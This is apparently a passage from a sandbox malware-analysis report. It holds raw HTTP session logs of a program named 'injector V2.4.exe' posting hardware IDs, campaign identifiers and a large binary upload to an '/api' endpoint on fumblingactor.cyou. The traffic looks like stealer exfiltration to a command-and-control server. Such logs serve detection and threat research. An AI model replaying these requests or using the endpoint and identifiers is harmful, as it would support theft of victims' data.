                                                                                  2024-11-21 15:52:06 UTC15060OUTData Raw: 2d 2d 42 55 49 52 57 4c 50 34 4c 59 56 50 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 42 55 49 52 57 4c 50 34 4c 59 56 50 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 55 49 52 57 4c 50 34 4c 59 56 50 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 0d 0a 2d 2d 42
                                                                                  Data Ascii: --BUIRWLP4LYVPBVContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--BUIRWLP4LYVPBVContent-Disposition: form-data; name="pid"2--BUIRWLP4LYVPBVContent-Disposition: form-data; name="lid"LPnhqo--uoaywzyrlsoc--B
                                                                                  2024-11-21 15:52:07 UTC994INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=o7f6g0546k9jjighaqm2een1tl; expires=Mon, 17-Mar-2025 09:38:46 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsUqm7nV3NO9rdRTtO1UNaQcJOPBSI9lnz5PWTPJkLTf9yTOPm6xHsVKvMH8QCHEWUEak%2B5akhFcpkt4pCkpP4smbIc6Z%2BjwAfUpsNuWRLtzIZkH1kGU5BEfdG6Jsu66OyM3%2BXw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d852ed4b8ce8-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1998&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15998&delivery_rate=1357508&cwnd=252&unsent_bytes=0&cid=bbd0c17c9f2a133c&ts=820&x=0"
                                                                                  2024-11-21 15:52:07 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-21 15:52:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549714172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:09 UTC276OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=C1QY4W1ZKU
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20526
                                                                                  Host: fumblingactor.cyou
                                                                                  2024-11-21 15:52:09 UTC15331OUTData Raw: 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 0d 0a 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43
                                                                                  Data Ascii: --C1QY4W1ZKUContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--C1QY4W1ZKUContent-Disposition: form-data; name="pid"3--C1QY4W1ZKUContent-Disposition: form-data; name="lid"LPnhqo--uoaywzyrlsoc--C1QY4W1ZKUC
                                                                                  2024-11-21 15:52:09 UTC5195OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: un 4F([:7s~X`nO`i
                                                                                  2024-11-21 15:52:10 UTC1002INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=0deiahqo4ailb8gasr0qff3djp; expires=Mon, 17-Mar-2025 09:38:49 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bt%2BnQu4wCnJ4vTpZDij7YKbM4JPnKsEKLPSPYtNuwfWug6cQnfssmQVfe%2F6O%2Fk0K5YzFlKYov%2B71G6sYaom9bWms0ferEFH4t%2F0%2BHsICT1OAxZzWy%2BcvBueaYchKlonDGjfcCBk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d8649da07288-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2005&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21482&delivery_rate=1423001&cwnd=243&unsent_bytes=0&cid=9943464aa0836ced&ts=935&x=0"
                                                                                  2024-11-21 15:52:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-21 15:52:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549715172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:12 UTC282OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=U0YBS5GLCGU18GRPD
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1266
                                                                                  Host: fumblingactor.cyou
                                                                                  2024-11-21 15:52:12 UTC1266OUTData Raw: 2d 2d 55 30 59 42 53 35 47 4c 43 47 55 31 38 47 52 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 55 30 59 42 53 35 47 4c 43 47 55 31 38 47 52 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 30 59 42 53 35 47 4c 43 47 55 31 38 47 52 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72
                                                                                  Data Ascii: --U0YBS5GLCGU18GRPDContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--U0YBS5GLCGU18GRPDContent-Disposition: form-data; name="pid"1--U0YBS5GLCGU18GRPDContent-Disposition: form-data; name="lid"LPnhqo--uoaywzyr
                                                                                  2024-11-21 15:52:13 UTC987INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=vdaht2i35o4k4et4onn0ic83gh; expires=Mon, 17-Mar-2025 09:38:52 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ohfjOgaPskapzYzW4Rs5pMU4a8130A1vPdgZpy5nw9XvRS45xYYW75uIuDzd4qWP4INVan8XLZ4c6Ktm1s9D6jshAUBGMk5XPgGMoSD7nLskK63q%2FjeR2TrstG0Y60S6w2uHWo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d877eb854238-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2184&delivery_rate=1751649&cwnd=244&unsent_bytes=0&cid=e6f0d3549477cdf9&ts=737&x=0"
                                                                                  2024-11-21 15:52:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                  Data Ascii: eok 8.46.123.75
                                                                                  2024-11-21 15:52:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549716172.67.219.1994431492C:\Users\user\Desktop\injector V2.4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-21 15:52:14 UTC277OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=OWS7AAIK91
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 569214
                                                                                  Host: fumblingactor.cyou
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 0d 0a 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43
                                                                                  Data Ascii: --OWS7AAIK91Content-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--OWS7AAIK91Content-Disposition: form-data; name="pid"1--OWS7AAIK91Content-Disposition: form-data; name="lid"LPnhqo--uoaywzyrlsoc--OWS7AAIK91C
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: bd 05 4b f5 0a 8c 91 72 96 d2 e0 48 58 4a 39 80 00 62 27 88 b1 87 52 24 80 d2 04 94 d5 08 67 9e 70 65 b8 0a 83 76 55 2c cc c7 c1 b2 6d d1 e1 99 62 eb fb 38 1e 3b c0 63 df 79 5b 34 08 af e8 e8 ee c6 f6 99 f2 5b fd ff 0f a2 53 0f 00 5a 71 07 98 e3 03 09 a6 94 7c 16 60 f6 f1 c1 fc 54 a5 4b 99 11 91 65 96 8b bd 99 e5 fc 10 f7 1f a2 f1 63 73 06 97 68 64 df 69 03 31 0e c9 20 de c2 21 35 d3 c9 83 0f 34 2b ae 06 9a a2 e3 76 3c 73 2a 83 14 d4 60 ca 0e 5e 89 26 d5 7f eb 43 7a 44 e2 27 04 b7 76 cb d0 9c 39 50 ec 48 4d f2 f3 e5 49 35 ee 94 56 12 a5 da 42 9e 3c 04 cb f5 96 00 1b 37 ee 74 49 29 a6 e8 1c 66 de 24 63 bb 39 c0 55 91 d5 e0 2c ca 21 ac 29 d6 f6 9a 9b 8e af 3b 2a 51 48 8c 2c 24 d1 59 d5 9c c9 5d 01 fe 7b a8 da e8 20 01 30 fd 1d bd b8 15 60 12 a8 96 cc be 61
                                                                                  Data Ascii: KrHXJ9b'R$gpevU,mb8;cy[4[SZq|`TKecshdi1 !54+v<s*`^&CzD'v9PHMI5VB<7tI)f$c9U,!);*QH,$Y]{ 0`a
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: 26 a4 dc 65 92 45 6d 26 b6 63 7a 5c 1a c3 03 4e 65 44 3c 10 d5 1b ae 75 8d e4 29 61 60 b5 4d ea b4 a5 9a 88 a3 2a ff db a4 1a ab 2f 96 cf 42 68 db d0 bc d8 d4 9a 9b 2f 34 fd fb 48 a0 3a 12 54 19 35 ba 7e c4 65 d0 d5 d8 4c 24 37 95 11 7e 69 9e bc e4 62 01 07 9d 26 e3 7d 12 17 ad 55 aa 13 77 32 42 89 a6 cf 2c e2 8e a0 09 28 76 5a f1 ca 57 85 f5 3a 49 77 15 86 e1 a4 52 63 f0 34 aa b1 bc 02 f1 bc c9 f9 26 5e 02 7b d4 8a 13 6b f4 77 10 58 b4 cf 66 04 2f be fc 72 ac f4 b7 7b 61 9d e5 d9 2b 3c 5a e6 9f 39 d9 0c 0d 3e 8c 24 e7 4c 02 6f 4f 5a 7b bb 22 42 e7 fc 16 fa fb c3 66 e6 ce c6 66 cd bf d7 42 c2 bb 69 b9 ee e5 64 14 a1 ed 69 ed f7 cd 56 59 e4 7f ea bc 45 b0 08 fd b6 d1 fc a7 28 aa fe 8f 8b 1d 1d 2a 8d a1 7b 59 63 19 97 d6 89 e3 4d a8 89 cb c0 3a 9e 82 9f c3
                                                                                  Data Ascii: &eEm&cz\NeD<u)a`M*/Bh/4H:T5~eL$7~ib&}Uw2B,(vZW:IwRc4&^{kwXf/r{a+<Z9>$LoOZ{"BffBidiVYE(*{YcM:
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: 12 3b 33 38 5e 3a a8 2f 1f 13 ee 68 73 a8 42 ef 1a a6 1c 68 d7 b4 1f 8e 94 58 77 9a f2 62 68 c1 0a d5 9b 8c 51 14 cf 4d f4 08 59 12 2c 3b a9 a3 1a 74 bd 80 d0 05 11 b7 e8 ba a5 a7 2a a9 df dd 86 58 36 53 f9 8b 29 7f eb 33 a4 da 74 df c8 83 c1 4b 23 85 e4 f3 cb 82 c5 86 8c e1 6f 65 07 09 b5 ed 77 be 0f 23 1d f2 57 40 7d d8 55 8f 5f 43 0a 9f 86 33 ab 81 76 b8 7a f6 2e 34 ad d5 ba 64 9e b3 e9 f4 51 92 06 70 6c 57 49 89 c7 a4 c7 a3 72 47 f1 8d df ea 6a de 3b 72 9c 1e 75 1e 6b 2a 7d 20 54 18 32 e2 9b 29 71 25 96 6a 4b 87 df ba 34 5e ae 40 f6 39 6a 3a aa 93 ea de f1 8d 42 bb 2a ec 91 fc 65 de ab a3 65 93 f1 83 e4 66 1b 35 ca a9 76 7a 83 49 3f 24 e2 43 d1 62 1b 0f 6d 2c 08 30 46 df 33 78 d6 7c 03 9d b7 4a 43 2b ce 2d a5 8a bf 6b c2 2d d6 50 6b 83 9e a4 d7 b4 d7
                                                                                  Data Ascii: ;38^:/hsBhXwbhQMY,;t*X6S)3tK#oew#W@}U_C3vz.4dQplWIrGj;ruk*} T2)q%jK4^@9j:B*eef5vzI?$Cbm,0F3x|JC+-k-Pk
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: c9 a0 26 c3 7e c5 cb 93 f9 b6 ef 0c 93 8c c7 db 71 a2 53 f1 aa 51 3b fa c4 07 b5 d7 db 65 88 f6 5c 93 a3 14 f6 71 5b 4f 6a 5f 4b e0 24 cd e7 cb 31 bc ef ca ae 2e 15 10 74 44 39 ad e3 49 83 59 39 ca 47 19 0d 61 15 c8 83 b0 c2 15 00 2d 61 0f b1 44 c1 0f de b6 1f c2 2d c4 60 37 ec ba 34 07 59 63 21 82 1e 89 0c 82 ae bb ab 34 f2 41 16 c0 5e 85 72 e8 f7 db 52 96 e3 94 87 67 15 1f cc a2 94 5d 86 d9 79 d0 ca 5e 21 e6 2e 4f 60 8a bd 36 82 65 ce f5 df dd bd d7 b3 33 57 bc f2 ea 6e 4c ba 5b 1d 73 3c 47 74 ca 39 21 5e 2c d8 01 2f 23 db f7 2d 09 3e be 19 bb a3 59 72 d1 49 8f 20 81 b9 10 eb d8 b7 ca 08 f4 d7 e9 9a b7 a9 b0 72 c8 ee 04 cd 8a a3 df 7f 08 27 e8 40 ba a6 2e ff 02 ed 0d d4 c6 9d 9e f1 6f 4d b6 82 28 70 4e c2 f2 9e 04 a8 22 d5 35 be 3f df 29 b4 73 f5 94 ae
                                                                                  Data Ascii: &~qSQ;e\q[Oj_K$1.tD9IY9Ga-aD-`74Yc!4A^rRg]y^!.O`6e3WnL[s<Gt9!^,/#->YrI r'@.oM(pN"5?)s
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: e0 f2 43 00 f4 6f 84 bb 87 5d 47 f9 f7 4e 30 9b 27 2a cb 9e 26 a0 d0 af 37 9e 22 3e 83 03 3c 23 40 93 c1 2c 83 d9 43 73 8f 1d 22 c3 6c 20 da f3 f2 04 96 e8 4f b8 09 16 23 1e ed 3d 0a 58 ee 36 a1 23 82 20 50 6f fd be 8c a7 7c b1 0e 01 12 80 77 c1 16 08 eb c5 10 73 47 8a a5 85 5b e9 39 0f c2 9f ae fb 85 0d 0a fa 1e 5e b6 9d af ec d9 e5 26 f1 37 eb 89 d7 d9 b1 56 74 ab 19 fe fe 7b cb 3e e0 1d c5 3f 91 a3 56 e8 24 02 dc 94 ec 06 c1 06 39 2a 40 4e 9c 7d 56 91 f1 45 fc 0b e4 1d a5 51 50 26 05 4d 77 2e c9 c6 32 7a 4a 70 b2 b9 67 10 c3 63 a2 d4 be fd dd 3b c1 e4 88 12 8e 71 5a 42 e2 4f 69 f2 3b 51 ea 09 22 71 f9 a7 54 b7 08 10 96 8e be f5 15 92 bb 5e e0 46 40 1b fc 9d 51 47 51 3b b1 a8 91 08 38 18 be 14 38 7d 24 83 ef 49 98 3d 46 f2 64 64 e1 22 37 8f d2 5a 99 0a
                                                                                  Data Ascii: Co]GN0'*&7"><#@,Cs"l O#=X6# Po|wsG[9^&7Vt{>?V$9*@N}VEQP&Mw.2zJpgc;qZBOi;Q"qT^F@QGQ;88}$I=Fdd"7Z
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: 6b 54 11 01 e1 fd cc b5 97 84 e8 9e b3 89 52 ae 73 6f 9d f6 b5 87 17 ef b4 a6 af de 6c 3b 84 b9 ec 88 74 71 97 13 31 2f 56 5e 97 e0 e3 18 b5 b7 f0 b6 a9 66 9d cf cf 36 be 58 59 ba 56 5c 75 df 45 27 b2 ea ea be aa d5 6e c7 ef bb 49 2c 9a d3 38 2c 78 1f aa 79 12 f0 5a e7 f9 5b 1f 56 0f 95 e9 28 55 6a f7 a5 85 f2 e3 ee 16 59 8a ea 7f 48 9f 07 fd fb dd 2d 99 61 3f 5f 59 47 ae 3a 3d ef 1c ce 91 88 5c 7d 71 db 4b 10 26 b4 ee cc 9c 3c fd c5 c1 b4 ff 7b e9 68 aa bd e4 27 b3 ef 07 33 b2 87 e3 98 b3 57 22 4d 19 31 b2 1b 5f 85 5a 8e 2f 44 37 14 ad 35 bc 5d 6f 58 bf 37 71 c2 e9 9d 70 c8 53 1b 98 6f b9 3b 06 15 a5 aa 21 59 cd c4 6d 5c 8d 2b c4 4b 3c 03 29 a1 8e d0 c2 9e 82 6b 1b a7 fc 46 9f 54 e5 f8 06 fb 39 28 c4 5a 1d a9 de b2 0b 0f d2 78 8d 18 fb d2 f8 35 87 7e 15
                                                                                  Data Ascii: kTRsol;tq1/V^f6XYV\uE'nI,8,xyZ[V(UjYH-a?_YG:=\}qK&<{h'3W"M1_Z/D75]oX7qpSo;!Ym\+K<)kFT9(Zx5~
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: 2c b7 d0 5c 13 46 57 78 a9 e1 e8 1a 53 75 d0 d1 b3 51 5d f0 d9 67 79 c2 11 8e 18 fa 7c b6 48 e3 1d 38 56 d6 64 6d b4 ba 43 55 9e 8c ed e0 87 9c 38 d0 d4 58 ba 8b 33 b0 6a b3 9c 2e 0c 24 86 60 bf 1d 94 f6 e2 fc c2 a6 27 e0 92 b7 61 6b 03 4c cd a3 b8 22 ba 4d 01 4d 96 95 20 88 2d 4f eb 0b e6 3b 37 95 1b 8b af 45 cc cf f1 98 33 22 92 b7 70 c0 4c cc 2c b3 bb 86 2a fe a8 ee dc 9c 87 67 03 d6 14 37 ae 08 e5 69 a0 c7 63 52 f8 66 2b 8e 28 ca 5f 70 89 d8 38 a7 4c 14 f8 31 70 1a db 56 6f ed 05 3b 72 f7 46 92 b5 4d be fc b8 a2 a0 b1 f8 dc 13 4a be 45 98 04 18 b4 d2 fa e0 18 a8 c6 d7 1e 86 b1 1a 76 50 20 07 33 07 fa cb 62 8d 53 b8 e7 98 19 57 d9 77 4d 09 29 98 a0 18 3a 13 10 de 93 bd f0 e9 a6 6a 1d a1 f0 f2 08 2e c4 67 f5 2b ef d6 6d 3b ed 33 ea c3 3c f0 dd 51 3f 26
                                                                                  Data Ascii: ,\FWxSuQ]gy|H8VdmCU8X3j.$`'akL"MM -O;7E3"pL,*g7icRf+(_p8L1pVo;rFMJEvP 3bSWwM):j.g+m;3<Q?&
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: e7 03 1f 53 3a c2 b1 a6 4b b9 90 6b 0c b5 4a 94 ba 4b b0 a8 8e 87 71 cb 27 9b f0 31 7c f9 38 aa fb fa f4 5d d3 e1 c4 20 24 4f a3 39 eb e6 35 99 96 a8 c2 84 20 c4 49 c6 98 27 b3 e8 6c 42 5b 00 69 e3 57 5e 5a 97 e6 2e 42 e3 6f cb d2 4f 43 51 8b 6a af 39 62 9c 7d 4b 71 72 e9 f3 34 44 7c d6 88 65 9e 97 47 de a8 79 0d 0a 87 5b f0 ec 55 6a cc eb e0 76 4b 12 09 84 10 0e 04 3b 2f 49 cc 44 65 be 65 f6 40 45 2f 1a d4 11 a7 fa 33 4e 0b 2c ec 13 57 17 8f f9 89 c4 0d ca ca 0f 45 ad f6 1f f0 7c 87 35 55 20 2a b9 46 c6 47 be e3 1b ae 00 e9 4b b6 69 92 42 2d 45 2f db b7 78 00 3b 98 6f d0 29 36 19 de da 24 4a 25 cf ac 9d 01 6d 87 b0 b5 5c 92 f1 ab b1 11 8f c5 b5 e8 c5 54 90 7e 12 4f 33 46 2f d9 08 9a 1e e6 3b be 17 bd d4 9a a4 a9 ac d4 87 06 3c fa 20 65 5b 40 93 9c 0e ac
                                                                                  Data Ascii: S:KkJKq'1|8] $O95 I'lB[iW^Z.BoOCQj9b}Kqr4D|eGy[UjvK;/IDee@E/3N,WE|5U *FGKiB-E/x;o)6$J%m\T~O3F/;< e[@
                                                                                  2024-11-21 15:52:14 UTC15331OUTData Raw: a7 bf 66 2c 7c ef 30 81 61 00 e8 7e aa 0c 27 24 59 08 f2 32 fc bc dd 25 26 fc 44 8d 37 e3 1a 06 96 fe 1b 5c 7d 12 83 c6 d6 dd ef 62 38 ea 05 0b 01 97 7d b1 5a a8 b7 84 d2 ae 78 49 a2 11 62 cb e6 cc eb dc cb 39 ad 90 26 92 fa 4a 31 5a c3 87 b0 ac c1 df 6c 40 5a d0 5c 1d a1 48 60 68 80 d8 de 59 52 35 64 28 86 ef de fe ef be f5 e5 a6 95 d9 6d 3c 35 30 6a 42 7f 68 b0 82 63 6f a7 d3 4f 02 e2 fe d8 85 2b c3 f8 8d 25 be b5 0a 06 fc 94 14 4b f0 06 08 d4 bf 7b ce 80 ce 5d f8 fd e1 3f e5 64 1f d7 ad 6a 92 11 64 23 64 f9 28 f2 77 3f 49 3a d6 89 58 00 88 bb 85 47 dc 45 97 f0 3c 25 c3 65 2e 6e c3 df 4a d3 49 21 e6 04 24 db 70 31 34 f4 89 f0 7f 64 14 6b 6f cc 65 09 ab d4 61 3b 13 f5 d8 08 23 ac 03 3f 61 fb 99 ff 46 9c 62 bc 2d ed 30 09 98 55 b0 1b 44 70 c3 8a 20 4d 0f
                                                                                  Data Ascii: f,|0a~'$Y2%&D7\}b8}ZxIb9&J1Zl@Z\H`hYR5d(m<50jBhcoO+%K{]?djd#d(w?I:XGE<%e.nJI!$p14dkoea;#?aFb-0UDp M
                                                                                  2024-11-21 15:52:17 UTC994INHTTP/1.1 200 OK
                                                                                  Date: Thu, 21 Nov 2024 15:52:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=r5dtpncmqdkluuifbqqbcjaaet; expires=Mon, 17-Mar-2025 09:38:55 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m2oMsci6R1Qajvu9tzCHWsrSeC7FGqaJF5yEDFA9HhS44pgSefjHD9tM4fQDlKgOSiaJSBFCnwGjSYhAEl39CY9EwaDCBYX13Whqev3q96ej1BubgWS0GIMLOx%2BV3Id9Rm9dLlQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e61d8867beb1801-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
